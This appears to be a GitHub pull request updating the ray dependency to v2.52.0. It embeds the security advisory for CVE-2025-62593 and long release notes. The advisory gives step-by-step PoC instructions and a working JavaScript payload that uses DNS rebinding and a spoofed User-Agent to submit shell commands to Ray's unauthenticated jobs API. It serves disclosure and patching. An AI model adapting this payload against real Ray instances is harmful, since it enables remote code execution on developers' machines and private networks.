-
Notifications
You must be signed in to change notification settings - Fork 132
chore(deps): update dependency ray to v2.52.0 [security] #5991
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Conversation
Merging this PR will not alter performance
Comparing Footnotes
|
Codecov Report✅ All modified and coverable lines are covered by tests. ☔ View full report in Codecov by Sentry. 🚀 New features to boost your workflow:
|
Signed-off-by: Adam Gutglick <adam@spiraldb.com>
Edited/Blocked NotificationRenovate will not automatically rebase this PR, because it does not recognize the last commit author and assumes somebody else may have edited the PR. You can manually request rebase by checking the rebase/retry box above. |
danking
left a comment
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
There's probably an argument for testing old versions of Ray, but the lock file in the repo should be free to change as we see fit.
> **Note:** This PR body was truncated due to platform limits.
This PR contains the following updates:
| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [ray](https://redirect.github.com/ray-project/ray) | `2.50.0` →
`2.52.0` |

|

|
### GitHub Vulnerability Alerts
####
[CVE-2025-62593](https://redirect.github.com/ray-project/ray/security/advisories/GHSA-q279-jhrf-cc6v)
# Summary
Developers working with Ray as a development tool can be exploited via a
critical RCE vulnerability exploitable via Firefox and Safari.
Due to the longstanding
[decision](https://docs.ray.io/en/releases-2.51.1/ray-security/index.html)
by the Ray Development team to not implement any sort of authentication
on critical endpoints, like the `/api/jobs` & `/api/job_agent/jobs/` has
once again led to a severe vulnerability that allows attackers to
execute arbitrary code against Ray. This time in a development context
via the browsers Firefox and Safari.
This vulnerability is due to an insufficient guard against browser-based
attacks, as the current defense uses the `User-Agent` header starting
with the string "Mozilla" as a defense mechanism. This defense is
insufficient as the fetch specification allows the `User-Agent` header
to be modified.
Combined with a DNS rebinding attack against the browser, and this
vulnerability is exploitable against a developer running Ray who
inadvertently visits a malicious website, or is served a malicious
advertisement
([malvertising](https://en.wikipedia.org/wiki/Malvertising)).
# Details
The mitigations implemented to protect against browser based attacks
against local Ray nodes are insufficient.
## Current Mitigation Strategies
```python
def is_browser_request(req: Request) -> bool:
"""Checks if a request is made by a browser like user agent.
This heuristic is very weak, but hard for a browser to bypass- eg,
fetch/xhr and friends cannot alter the user-agent, but requests made with
an http library can stumble into this if they choose to user a browser like
user agent.
"""
return req.headers["User-Agent"].startswith("Mozilla")
def deny_browser_requests() -> Callable:
"""Reject any requests that appear to be made by a browser"""
def decorator_factory(f: Callable) -> Callable:
@​functools.wraps(f)
async def decorator(self, req: Request):
if is_browser_request(req):
return Response(
text="Browser requests not allowed",
status=aiohttp.web.HTTPMethodNotAllowed.status_code,
)
return await f(self, req)
return decorator
return decorator_factory
```
https://github.com/ray-project/ray/blob/f39a860436dca3ed5b9dfae84bd867ac10c84dc6/python/ray/dashboard/optional_utils.py#L129-L155
```python
@​aiohttp.web.middleware
async def browsers_no_post_put_middleware(self, request, handler):
if (
# A best effort test for browser traffic. All common browsers
# start with Mozilla at the time of writing.
dashboard_optional_utils.is_browser_request(request)
and request.method in [hdrs.METH_POST, hdrs.METH_PUT]
):
return aiohttp.web.Response(
status=405, text="Method Not Allowed for browser traffic."
)
return await handler(request)
```
https://github.com/ray-project/ray/blob/e7889ae542bf0188610bc8b06d274cbf53790cbd/python/ray/dashboard/http_server_head.py#L184-L196
This is because the fundamental assumption that the `User-Agent` header
can't be manipulated is incorrect. In Firefox and in Safari, the `fetch`
API allows the `User-Agent` header to be set to a different value.
Chrome is not vulnerable, ironically, because of a
[bug](https://issues.chromium.org/issues/40450316), bringing it out of
spec with the `fetch` specification.
Exploiting this vulnerability requires a DNS rebinding attack against
the browser. Something trivially done by modern tooling like
[nccgroup/singularity](https://redirect.github.com/nccgroup/singularity).
# PoC
Please note, this full PoC will be going live at time of disclosure.
1. Launch Ray `ray start --head --port=6379`
2. Ensure that the ray dashboard/service is running on port `8265`
3. Launch an internet facing version of NCCGroup/Singularity following
the [setup guide
here](https://redirect.github.com/nccgroup/singularity/wiki/Setup-and-Installation).
4. Visit the in Firefox or Safari:
http://[my.singularity.instance]:8265/manager.html
5. Under "Attack Payload" select: `Ray Jobs RCE (default port 8265)`
6. Click "Start Attack". If you see a 404 error in the iFrame window
that pops up, refresh the page and retry starting at step 3.
7. Once the DNS rebinding attack succeeds (you may need to try a few
times), an alert will appear, then the jobs API will be invoked, and the
embedded shell code will be executed, popping up the calculator.
If this attack doesn't work, consider clicking the "Toggle Advanced
Options" and trying an alternative "Rebinding Strategy". I've personally
been able to get this attack to work multiple times on MacOS on multiple
different residential networks around the Seattle area. Some corporate
networks _may_ block DNS rebinding attacks, but likely not many.
## What's going on?
This is the payload running in
[nccgroup/singularity](https://redirect.github.com/nccgroup/singularity):
```javascript
/**
* This payload exploits Ray (https://github.com/ray-project/ray)
* It opens the "Calculator" application on various operating systems.
* The payload can be easily modified to target different OSes or implementations.
* The TCP port attacked is 8265.
*/
const RayRce = () => {
// Invoked after DNS rebinding has been performed
function attack(headers, cookie, body) {
// Get the current timestamp in milliseconds
const timestamp = Date.now();
// OS-agnostic calculator command that tries multiple approaches
const calculatorCommand = `
# Try Windows calculator first
if command -v calc.exe >/dev/null 2>&1; then
echo Windows calculator launching
calc.exe &
# Try macOS calculator
elif command -v open >/dev/null 2>&1; then
echo macOS calculator launching
open -a Calculator &
elif [ -f "/System/Applications/Calculator.app/Contents/MacOS/Calculator" ]; then
echo macOS calculator launching
/System/Applications/Calculator.app/Contents/MacOS/Calculator &
# Try Linux calculators
elif command -v gnome-calculator >/dev/null 2>&1; then
echo Linux calculator launching
gnome-calculator &
elif command -v kcalc >/dev/null 2>&1; then
echo Linux calculator launching
kcalc &
elif command -v xcalc >/dev/null 2>&1; then
echo Linux calculator launching
xcalc &
# Fallback: try to find any calculator binary
else
echo Linux calculator launching
find /usr/bin /usr/local/bin /opt -name "*calc*" -type f -executable 2>/dev/null | head -1 | xargs -I {} {} &
fi
echo RAY RCE: By JLLeitschuh ${timestamp}
`;
const data = {
"entrypoint": calculatorCommand,
"runtime_env": {},
"job_id": null,
"metadata": {
"job_submission_id": timestamp.toString(),
"source": "nccgroup/singluarity"
}
};
sooFetch('/api/jobs/', {
method: 'POST',
headers: {
'User-Agent': 'Other',
},
body: JSON.stringify(data),
})
.then(response => {
console.log(response);
return response.json()
}) // parses JSON response into native JavaScript objects
.then(data => {
console.log('Success:', data);
})
.catch((error) => {
console.error('Error:', error);
});
}
// Invoked to determine whether the rebinded service
// is the one targeted by this payload. Must return true or false.
async function isService(headers, cookie, body) {
return sooFetch("/",{
mode: 'no-cors',
credentials: 'omit',
})
.then(function (response) {
return response.text()
})
.then(function (d) {
if (d.includes("You need to enable JavaScript")) {
return true;
} else {
return false;
}
})
.catch(e => { return (false); })
}
return {
attack,
isService
}
}
Registry["Ray Jobs RCE"] = RayRce();
```
See:
[https://github.com/nccgroup/singularity/pull/68](https://redirect.github.com/nccgroup/singularity/pull/68)
# Impact
This vulnerability impacts developers running development/testing
environments with Ray. If they fall victim to a phishing attack, or are
served a malicious ad, they can be exploited and arbitrary shell code
can be executed on their developer machine.
This attack can also be leveraged to attack network-adjacent instance of
ray by leveraging the browser as a confused deputy intermediary to
attack ray instances running inside a private corporate network.
# Fix
The fix for this vulnerability is to update to Ray 2.52.0 or higher.
This version also, finally, adds a disabled-by-default authentication
feature that can further harden against this vulnerability:
https://docs.ray.io/en/latest/ray-security/token-auth.html
Fix commit:
https://github.com/ray-project/ray/commit/70e7c72780bdec075dba6cad1afe0832772bfe09
Several browsers have, after knowing about the attack for 19 years,
recently begun hardening against DNS rebinding. ([Chrome Local Network
Access](https://developer.chrome.com/blog/local-network-access)). These
changes _may_ protect you, but a previous initiative, "private network
access" was rolled back. So updating is highly recommended as a
defense-in-depth strategy.
# Credit
The fetch bypass was originally theorized by @​avilum at
[Oligo](https://www.oligo.security/). The DNS rebinding step, full POC,
and disclosure was by @​JLLeitschuh while at
[Socket](https://socket.dev/).
---
### Release Notes
<details>
<summary>ray-project/ray (ray)</summary>
###
[`v2.52.0`](https://redirect.github.com/ray-project/ray/releases/tag/ray-2.52.0)
[Compare
Source](https://redirect.github.com/ray-project/ray/compare/ray-2.51.2...ray-2.52.0)
##### Release Highlights
**Ray Core:**
- End of Life for Python 3.9 Support: Ray will no longer be releasing
Python 3.9 wheels from now on.
- Token authentication: Ray now supports built-in token authentication
across all components including the dashboard, CLI, API clients, and
internal services. This provides an additional layer of security for
production deployments to reduce the risk of unauthorized code
execution. Token authentication is initially off by default. For more
information, see:
<https://docs.ray.io/en/latest/ray-security/token-auth.html>
**Ray Data:**
- We’ve added a number of improvements for Iceberg, including upserts,
predicate and projection pushdown, and overwrite.
- We’ve added significant improvements to our expressions framework,
including temporal, list, tensor, and struct datatype expressions.
##### Ray Libraries
##### Ray Data
🎉 New Features:
- Added predicate pushdown rule that pushes filter predicates past
eligible operators
([#​58150](https://redirect.github.com/ray-project/ray/pull/58150),[
#​58555](https://redirect.github.com/ray-project/ray/pull/58555))
- Iceberg support for upsert tables, schema updates, and overwrite
operations
([#​58270](https://redirect.github.com/ray-project/ray/pull/58270))
- Iceberg support for predicate and projection pushdown
([#​58286](https://redirect.github.com/ray-project/ray/pull/58286))
- Iceberg write datafiles in write() then commit
([#​58601](https://redirect.github.com/ray-project/ray/pull/58601))
- Enhanced Unity Catalog integration
([#​57954](https://redirect.github.com/ray-project/ray/pull/57954))
- Namespaced expressions that expose PyArrow functions
([#​58465](https://redirect.github.com/ray-project/ray/pull/58465))
- Added version argument to read\_delta\_lake
([#​54976](https://redirect.github.com/ray-project/ray/pull/54976))
- Generator UDF support for map\_groups
([#​58039](https://redirect.github.com/ray-project/ray/pull/58039))
- ApproximateTopK aggregator
([#​57950](https://redirect.github.com/ray-project/ray/pull/57950))
- Serialization framework for preprocessors
([#​58321](https://redirect.github.com/ray-project/ray/pull/58321))
- Support for temporal, list, tensor, and struct datatypes
([#​58225](https://redirect.github.com/ray-project/ray/pull/58225))
💫 Enhancements:
- Use approximate quantile for RobustScaler preprocessor
([#​58371](https://redirect.github.com/ray-project/ray/pull/58371))
- Map batches support for limit pushdown
([#​57880](https://redirect.github.com/ray-project/ray/pull/57880))
- Make all map operations zero-copy by default
([#​58285](https://redirect.github.com/ray-project/ray/pull/58285))
- Use tqdm\_ray for progress reporting from workers
([#​58277](https://redirect.github.com/ray-project/ray/pull/58277))
- Improved concurrency cap backpressure tuning
([#​58163](https://redirect.github.com/ray-project/ray/pull/58163),[
#​58023](https://redirect.github.com/ray-project/ray/pull/58023),[
#​57996](https://redirect.github.com/ray-project/ray/pull/57996))
- Sample finalized partitions randomly to avoid lens effect
([#​58456](https://redirect.github.com/ray-project/ray/pull/58456))
- Allow file extensions starting with '.'
([#​58339](https://redirect.github.com/ray-project/ray/pull/58339))
- Set default file\_extensions for read\_parquet
([#​56481](https://redirect.github.com/ray-project/ray/pull/56481))
- URL decode values in parse\_hive\_path
([#​57625](https://redirect.github.com/ray-project/ray/pull/57625))
- Streaming partition enforces row\_num per block
([#​57984](https://redirect.github.com/ray-project/ray/pull/57984))
- Streaming repartition combines small blocks
([#​58020](https://redirect.github.com/ray-project/ray/pull/58020))
- Lower
DEFAULT\_ACTOR\_MAX\_TASKS\_IN\_FLIGHT\_TO\_MAX\_CONCURRENCY\_FACTOR to
2
([#​58262](https://redirect.github.com/ray-project/ray/pull/58262))
- Set udf-modifying-row-count default to false
([#​58264](https://redirect.github.com/ray-project/ray/pull/58264))
- Cache PyArrow schema operations
([#​58583](https://redirect.github.com/ray-project/ray/pull/58583))
- Explain optimized plans
([#​58074](https://redirect.github.com/ray-project/ray/pull/58074))
- Ranker interface
([#​58513](https://redirect.github.com/ray-project/ray/pull/58513))
🔨 Fixes:
- Fixed renamed columns to be appropriately dropped from output
([#​58040](https://redirect.github.com/ray-project/ray/pull/58040),[
#​58071](https://redirect.github.com/ray-project/ray/pull/58071))
- Fixed handling of renames in projection pushdown
([#​58033](https://redirect.github.com/ray-project/ray/pull/58033),[
#​58037](https://redirect.github.com/ray-project/ray/pull/58037))
- Fixed broken LogicalOperator abstraction barrier in predicate pushdown
rule
([#​58683](https://redirect.github.com/ray-project/ray/pull/58683))
- Fixed file size ordering in download partitioning with multiple URI
columns
([#​58517](https://redirect.github.com/ray-project/ray/pull/58517))
- Fixed HTTP streaming file download by using open\_input\_stream
([#​58542](https://redirect.github.com/ray-project/ray/pull/58542))
- Fixed expression mapping for Pandas
([#​57868](https://redirect.github.com/ray-project/ray/pull/57868))
- Fixed reading from zipped JSON
([#​58214](https://redirect.github.com/ray-project/ray/pull/58214))
- Fixed MCAP datasource import for better compatibility
([#​57964](https://redirect.github.com/ray-project/ray/pull/57964))
- Avoid slicing block when total\_pending\_rows < target
([#​58699](https://redirect.github.com/ray-project/ray/pull/58699))
- Clear queue for manually marked execution\_finished operators
([#​58441](https://redirect.github.com/ray-project/ray/pull/58441))
- Add exception handling for invalid URIs in download operation
([#​58464](https://redirect.github.com/ray-project/ray/pull/58464))
- Fixed progress bar name display
([#​58451](https://redirect.github.com/ray-project/ray/pull/58451))
📖 Documentation:
- Documentation for Ray Data metrics
([#​58610](https://redirect.github.com/ray-project/ray/pull/58610))
- Simplify and add Ray Data LLM quickstart example
([#​58330](https://redirect.github.com/ray-project/ray/pull/58330))
- Convert rST-style to Google-style docstrings
([#​58523](https://redirect.github.com/ray-project/ray/pull/58523))
🏗 Architecture:
- Removed stats update thread
([#​57971](https://redirect.github.com/ray-project/ray/pull/57971))
- Refactor histogram metrics
([#​57851](https://redirect.github.com/ray-project/ray/pull/57851))
- Revisit OpResourceAllocator to make data flow explicit
([#​57788](https://redirect.github.com/ray-project/ray/pull/57788))
- Create unit test directory for fast, isolated tests
([#​58445](https://redirect.github.com/ray-project/ray/pull/58445))
- Dump verbose ResourceManager telemetry into ray-data.log
([#​58261](https://redirect.github.com/ray-project/ray/pull/58261))
##### Ray Train
🎉 New Features:
- Result::from\_path implementation in v2
([#​58216](https://redirect.github.com/ray-project/ray/pull/58216))
💫 Enhancements:
- Exit actor and log appropriately when poll\_workers is in terminal
state
([#​58287](https://redirect.github.com/ray-project/ray/pull/58287))
- Set JAX\_PLATFORMS environment variable based on ScalingConfig
([#​57783](https://redirect.github.com/ray-project/ray/pull/57783))
- Default to disabling Ray Train collective util timeouts
([#​58229](https://redirect.github.com/ray-project/ray/pull/58229))
- Add SHUTTING\_DOWN TrainControllerState and improve logging
([#​57882](https://redirect.github.com/ray-project/ray/pull/57882))
- Improved error message when calling training function utils outside
Ray Train worker
([#​57863](https://redirect.github.com/ray-project/ray/pull/57863))
- FSDP2 template: Resume from previous epoch when checkpointing
([#​57938](https://redirect.github.com/ray-project/ray/pull/57938))
- Clean up checkpoint config and trainer param deprecations
([#​58022](https://redirect.github.com/ray-project/ray/pull/58022))
- Update failure policy log message
([#​58274](https://redirect.github.com/ray-project/ray/pull/58274))
📖 Documentation:
- Ray Train Metrics documentation page
([#​58235](https://redirect.github.com/ray-project/ray/pull/58235))
- Local mode user guide
([#​57751](https://redirect.github.com/ray-project/ray/pull/57751))
- Recommend tree\_learner="data\_parallel" in examples for distributed
LightGBM training
([#​58709](https://redirect.github.com/ray-project/ray/pull/58709))
##### Ray Serve
##### 🎉 New Features:
- **Custom request routing with runtime environment support.** Users can
now define custom request router classes that are safely imported and
serialized using the application's runtime environment, enabling
advanced routing logic with custom dependencies.
([#​56855](https://redirect.github.com/ray-project/ray/issues/56855))
- **Custom autoscaling policies with enhanced logging.**
Deployment-level and application-level autoscaling policies now display
their custom policy names in logs, making it easier to debug and monitor
autoscaling behavior.
([#​57878](https://redirect.github.com/ray-project/ray/issues/57878))
- **Audio transcription support in vLLM backend.** Ray Serve now
supports transcription tasks through the vLLM engine, expanding
multimodal capabilities.
([#​57194](https://redirect.github.com/ray-project/ray/issues/57194))
- **Data parallel attention public API.** Introduced a public API for
data parallel attention, enabling efficient distributed attention
mechanisms for large-scale inference workloads.
([#​58301](https://redirect.github.com/ray-project/ray/issues/58301))
- **Route pattern tracking in proxy metrics.** Proxy metrics now expose
actual route patterns (e.g., `/api/users/{user_id}`) instead of just
route prefixes, enabling granular endpoint monitoring without high
cardinality issues. Performance impact is minimal (\~1% RPS decrease).
([#​58180](https://redirect.github.com/ray-project/ray/issues/58180))
- **Replica dependency graph construction.** Added
`list_outbound_deployments()` method to discover downstream deployment
dependencies, enabling programmatic analysis of service topology for
both stored and dynamically-obtained handles.
([#​58345](https://redirect.github.com/ray-project/ray/issues/58345),
[#​58350](https://redirect.github.com/ray-project/ray/issues/58350))
- **Multi-dimensional replica ranking.** Introduced `ReplicaRank` schema
with global, node-level, and local ranks to support advanced
coordination scenarios like tensor parallelism and model sharding across
nodes.
([#​58471](https://redirect.github.com/ray-project/ray/issues/58471),
[#​58473](https://redirect.github.com/ray-project/ray/issues/58473))
- **Proxy readiness verification.** Added a check to ensure proxies are
ready to serve traffic before `serve.run()` completes, improving
deployment reliability.
([#​57723](https://redirect.github.com/ray-project/ray/issues/57723))
- **IPv6 socket support.** Ray Serve now supports IPv6 networking for
socket communication.
([#​56147](https://redirect.github.com/ray-project/ray/issues/56147))
##### 💫 Enhancements:
- **Selective throughput optimization flag overrides.** Users can now
override individual flags set by `RAY_SERVE_THROUGHPUT_OPTIMIZED`
without manually configuring all flags, improving flexibility for
performance tuning.
([#​58057](https://redirect.github.com/ray-project/ray/issues/58057))
- **OpenTelemetry metrics enabled by default.** Ray now uses
OpenTelemetry as the default metrics backend, with updated metric names
(`ray_serve_*`) and improved observability infrastructure.
([#​56432](https://redirect.github.com/ray-project/ray/issues/56432))
- **Cleaner long-poll communication.** Removed actor handles from
`RunningReplicaInfo` objects passed in long-poll updates, avoiding
complex reference counting patterns.
([#​58174](https://redirect.github.com/ray-project/ray/issues/58174))
- **Improved replica config handling.** Excluded
`IMPLICIT_RESOURCE_PREFIX` from `ReplicaConfig.ray_actor_options` to
prevent internal resource annotations from leaking into user-visible
configurations.
([#​58275](https://redirect.github.com/ray-project/ray/issues/58275))
- **Custom autoscaling telemetry.** Added telemetry tracking for custom
autoscaling policy usage.
([#​58336](https://redirect.github.com/ray-project/ray/issues/58336))
- **Proxy target group control.** Added `from_proxy_manager` argument to
`get_target_groups()` for finer control over returned routing targets.
([#​57620](https://redirect.github.com/ray-project/ray/issues/57620))
##### 🔨 Fixes:
- **Fixed default deployment name in async inference.** Corrected the
default deployment name which was changed to `_TaskConsumerWrapper`
during async inference implementation.
([#​57664](https://redirect.github.com/ray-project/ray/issues/57664))
- **Fixed proxy location handling in CLI and Python API.** `serve run`
now respects `proxy_location` from config files instead of hardcoding
`EveryNode`, and `serve.start()` no longer defaults to `HeadOnly` when
`http_options` are provided without an explicit location.
([#​57622](https://redirect.github.com/ray-project/ray/issues/57622))
- **Fixed deprecated Stable Diffusion model in example.** Updated
documentation example to use a current model after
`stabilityai/stable-diffusion-2` was deprecated on Hugging Face.
([#​58609](https://redirect.github.com/ray-project/ray/issues/58609))
##### 📖 Documentation:
- **KV-cache offloading user guide.** Added comprehensive documentation
for KV-cache offloading in LLM deployments.
([#​58025](https://redirect.github.com/ray-project/ray/issues/58025))
- **Model loading documentation.** Documented best practices and options
for loading models in Ray Serve.
([#​57922](https://redirect.github.com/ray-project/ray/issues/57922))
- **Cross-node tensor/pipeline parallelism examples.** Added examples
and documentation for running TP/PP across multiple nodes.
([#​57715](https://redirect.github.com/ray-project/ray/issues/57715))
- **Data parallel attention documentation.** Created user guide for data
parallel attention with architecture diagrams.
([#​58301](https://redirect.github.com/ray-project/ray/issues/58301),
[#​58543](https://redirect.github.com/ray-project/ray/issues/58543))
- **Custom autoscaling policy examples.** Added missing imports and
improved clarity in autoscaling policy examples.
([#​57896](https://redirect.github.com/ray-project/ray/issues/57896),
[#​58170](https://redirect.github.com/ray-project/ray/issues/58170))
- **Async inference documentation improvements.** Added notes about task
consumer replica configurations and fixed the end-to-end example.
([#​58493](https://redirect.github.com/ray-project/ray/issues/58493))
- **Callback documentation.** Added documentation for using callbacks in
Ray Serve.
([#​58713](https://redirect.github.com/ray-project/ray/issues/58713))
- **Monitoring and troubleshooting improvements.** Enhanced monitoring
section with links to Anyscale troubleshooting resources.
([#​58472](https://redirect.github.com/ray-project/ray/issues/58472))
- **Minor documentation fixes.** Fixed spelling errors and improved
docstring alignment.
([#​58172](https://redirect.github.com/ray-project/ray/issues/58172),
[#​58233](https://redirect.github.com/ray-project/ray/issues/58233))
##### 🏗 Architecture refactoring:
- **Replica rank management refactoring.** Extracted generic
`RankManager` class with type-safe `ReplicaRank` representation,
creating a cleaner foundation for future multi-level rank support.
([#​58471](https://redirect.github.com/ray-project/ray/issues/58471),
[#​58473](https://redirect.github.com/ray-project/ray/issues/58473))
##### Ray Tune
💫 Enhancements:
- Updated jobs test to use tune module
([#​57995](https://redirect.github.com/ray-project/ray/pull/57995))
- Add pydantic to Ray Tune requirements
([#​58354](https://redirect.github.com/ray-project/ray/pull/58354))
##### RLlib
🎉 New Features:
- Support for vectorize modes in SingleAgentEnvRunner.make\_env
([#​58410](https://redirect.github.com/ray-project/ray/pull/58410))
- Support for composed spaces in Offline RL
([#​58594](https://redirect.github.com/ray-project/ray/pull/58594))
- Enhanced support for complex observations in SingleAgentEpisode
([#​57017](https://redirect.github.com/ray-project/ray/pull/57017))
- Prometheus metrics support for selected components
([#​57932](https://redirect.github.com/ray-project/ray/pull/57932))
💫 Enhancements:
- Improve test\_single\_agent\_env\_runner to prevent flaky tests
([#​58397](https://redirect.github.com/ray-project/ray/pull/58397))
- LINT improvements with enabled ruff imports across multiple modules
([#​56737](https://redirect.github.com/ray-project/ray/pull/56737),[
#​56734](https://redirect.github.com/ray-project/ray/pull/56734),[
#​56741](https://redirect.github.com/ray-project/ray/pull/56741),[
#​56742](https://redirect.github.com/ray-project/ray/pull/56742),[
#​56744](https://redirect.github.com/ray-project/ray/pull/56744),[
#​56746](https://redirect.github.com/ray-project/ray/pull/56746))
🔨 Fixes:
- Resolve bug that fails to propagate model\_config to
MultiAgentRLModule instances
([#​58243](https://redirect.github.com/ray-project/ray/pull/58243))
- Fixed access to self.\_minibatch\_size
([#​58595](https://redirect.github.com/ray-project/ray/pull/58595))
- Broken restore from remote - Add missing FileSystem argument
([#​58324](https://redirect.github.com/ray-project/ray/pull/58324))
- Fixed deterministic sampling and training documentation link
([#​58494](https://redirect.github.com/ray-project/ray/pull/58494))
- Corrected typo in pyspiel import error message
([#​54618](https://redirect.github.com/ray-project/ray/pull/54618))
📖 Documentation:
- Add reinforcement learning example illustrating GPU-to-GPU RDT and
GRPO
([#​57961](https://redirect.github.com/ray-project/ray/pull/57961))
##### Ray Core
🎉 New Features:
- Token-based authentication across all Ray components
([#​58046](https://redirect.github.com/ray-project/ray/pull/58046),
[#​58047](https://redirect.github.com/ray-project/ray/pull/58047),
[#​58176](https://redirect.github.com/ray-project/ray/pull/58176),[
#​58209](https://redirect.github.com/ray-project/ray/pull/58209),
[#​58276](https://redirect.github.com/ray-project/ray/pull/58276),[
#​58281](https://redirect.github.com/ray-project/ray/pull/58281),
[#​58308](https://redirect.github.com/ray-project/ray/pull/58308),[
#​58333](https://redirect.github.com/ray-project/ray/pull/58333),
[#​58368](https://redirect.github.com/ray-project/ray/pull/58368),[
#​58395](https://redirect.github.com/ray-project/ray/pull/58395),
[#​58405](https://redirect.github.com/ray-project/ray/pull/58405),[
#​58408](https://redirect.github.com/ray-project/ray/pull/58408),
[#​58424](https://redirect.github.com/ray-project/ray/pull/58424),[
#​58557](https://redirect.github.com/ray-project/ray/pull/58557),
[#​57835](https://redirect.github.com/ray-project/ray/pull/57835),
[#​58566](https://redirect.github.com/ray-project/ray/pull/58566),
[#​58591](https://redirect.github.com/ray-project/ray/pull/58591))
- OpenTelemetry enabled by default for improved observability
([#​56432](https://redirect.github.com/ray-project/ray/pull/56432))
- Fallback strategy scheduling logic
([#​56369](https://redirect.github.com/ray-project/ray/pull/56369))
- TPU utility functions to support slice placement groups
([#​56723](https://redirect.github.com/ray-project/ray/pull/56723))
- Exponential backoff for retryable gRPCs
([#​56568](https://redirect.github.com/ray-project/ray/pull/56568))
- Option for in-flight RPC failure injection
([#​58512](https://redirect.github.com/ray-project/ray/pull/58512))
- Release test to simulate network transient errors via iptables
([#​58241](https://redirect.github.com/ray-project/ray/pull/58241))
- Nightly release test with cross-AZ fault injection
([#​57579](https://redirect.github.com/ray-project/ray/pull/57579))
- Owned object spill metrics
([#​57870](https://redirect.github.com/ray-project/ray/pull/57870))
- Monitoring in raylet for resource view
([#​58382](https://redirect.github.com/ray-project/ray/pull/58382))
- IPv6 support for sockets
([#​56147](https://redirect.github.com/ray-project/ray/pull/56147))
💫 Enhancements:
- Fault-tolerant RPCs: KillActor, CancelRemoteTask, NotifyGCSRestart,
and ReleaseUnusedBundles
([#​57648](https://redirect.github.com/ray-project/ray/pull/57648),[
#​57945](https://redirect.github.com/ray-project/ray/pull/57945),[
#​57965](https://redirect.github.com/ray-project/ray/pull/57965))
- Use graceful actor shutdown when GCS polling detects actor ref deleted
([#​58605](https://redirect.github.com/ray-project/ray/pull/58605))
- Use graceful shutdown path when actor OUT\_OF\_SCOPE (del actor)
([#​57090](https://redirect.github.com/ray-project/ray/pull/57090))
- Improved actor kill logs
([#​58544](https://redirect.github.com/ray-project/ray/pull/58544))
- Scheduling detached actor with placement group not recommended
([#​57726](https://redirect.github.com/ray-project/ray/pull/57726))
- Better handling of detached actor restarts
([#​57931](https://redirect.github.com/ray-project/ray/pull/57931))
- Enhanced ray.get thread safety
([#​57911](https://redirect.github.com/ray-project/ray/pull/57911))
- Making concurrent ray.get requests for the same object thread-safe
([#​58606](https://redirect.github.com/ray-project/ray/pull/58606))
- Move request ID creation to worker to address plasma get perf
regression
([#​58390](https://redirect.github.com/ray-project/ray/pull/58390))
- Make GlobalState lazy initialization thread-safe
([#​58182](https://redirect.github.com/ray-project/ray/pull/58182))
- Reporter agent can get PID via RPC to raylet
([#​57004](https://redirect.github.com/ray-project/ray/pull/57004))
- Add tee logging for subprocess exit codes in ray start --block
([#​57982](https://redirect.github.com/ray-project/ray/pull/57982))
- Add entrypoint log for jobs
([#​58300](https://redirect.github.com/ray-project/ray/pull/58300))
- Cleaner error message for exceeding list actors limit
([#​58255](https://redirect.github.com/ray-project/ray/pull/58255))
- Clean up NODE\_DIED task error message
([#​58638](https://redirect.github.com/ray-project/ray/pull/58638))
- Improved histogram metrics midpoint calculation
([#​57948](https://redirect.github.com/ray-project/ray/pull/57948))
- Migrated from STATS to metric interface in RPC components
([#​57926](https://redirect.github.com/ray-project/ray/pull/57926))
- Kill STATS in core worker component
([#​58060](https://redirect.github.com/ray-project/ray/pull/58060))
- Kill STATS in object manager component
([#​57974](https://redirect.github.com/ray-project/ray/pull/57974))
- Improve scheduler\_placement\_time\_s metric
([#​58217](https://redirect.github.com/ray-project/ray/pull/58217))
- Refactor OpenTelemetry environment variable handling
([#​57910](https://redirect.github.com/ray-project/ray/pull/57910))
- Add option to disable OpenTelemetry SDK error logs
([#​58257](https://redirect.github.com/ray-project/ray/pull/58257))
- Improved cgroups support
([#​57776](https://redirect.github.com/ray-project/ray/pull/57776),[
#​57864](https://redirect.github.com/ray-project/ray/pull/57864),[
#​57731](https://redirect.github.com/ray-project/ray/pull/57731),[
#​58017](https://redirect.github.com/ray-project/ray/pull/58017),[
#​58028](https://redirect.github.com/ray-project/ray/pull/58028),[
#​58059](https://redirect.github.com/ray-project/ray/pull/58059),[
#​58064](https://redirect.github.com/ray-project/ray/pull/58064),[
#​58577](https://redirect.github.com/ray-project/ray/pull/58577))
- Use GetNodeAddressAndLiveness in raylet client pool
([#​58576](https://redirect.github.com/ray-project/ray/pull/58576))
- Ray Direct Transport improvements with NIXL integration
([#​57671](https://redirect.github.com/ray-project/ray/pull/57671),[
#​58550](https://redirect.github.com/ray-project/ray/pull/58550),[
#​58548](https://redirect.github.com/ray-project/ray/pull/58548),[
#​56783](https://redirect.github.com/ray-project/ray/pull/56783),[
#​58263](https://redirect.github.com/ray-project/ray/pull/58263))
- Fix symmetric-run
([#​58337](https://redirect.github.com/ray-project/ray/pull/58337))
- Make worker connection timeout parameters configurable
([#​58372](https://redirect.github.com/ray-project/ray/pull/58372))
- Define env for controlling UVloop
([#​58442](https://redirect.github.com/ray-project/ray/pull/58442))
- Allow 60 seconds for dashboard to start
([#​58341](https://redirect.github.com/ray-project/ray/pull/58341))
- Report driver stats
([#​58045](https://redirect.github.com/ray-project/ray/pull/58045))
- Fix idle node termination on object pulling
([#​57928](https://redirect.github.com/ray-project/ray/pull/57928))
- Check if temp\_dir is subdir of virtualenv to prevent runtime
virtualenv problems
([#​58084](https://redirect.github.com/ray-project/ray/pull/58084))
🔨 Fixes:
- Fixed use-after-free in RayletClient
([#​58747](https://redirect.github.com/ray-project/ray/pull/58747))
- Fixed deadlock when cancelling stale requests on in-order actors
([#​57746](https://redirect.github.com/ray-project/ray/pull/57746))
- Fixed "RayEventRecorder::StartExportingEvents() should be called only
once" error
([#​57917](https://redirect.github.com/ray-project/ray/pull/57917))
- Fixed raylet shutdown races
([#​57198](https://redirect.github.com/ray-project/ray/pull/57198))
- Fixed incorrect usage of gRPC streaming API in ray syncer
([#​58307](https://redirect.github.com/ray-project/ray/pull/58307))
- Fixed log monitor seeking bug after log rotation
([#​56902](https://redirect.github.com/ray-project/ray/pull/56902))
- Fixed idempotency issues in RequestWorkerLease for scheduled leases
([#​58265](https://redirect.github.com/ray-project/ray/pull/58265))
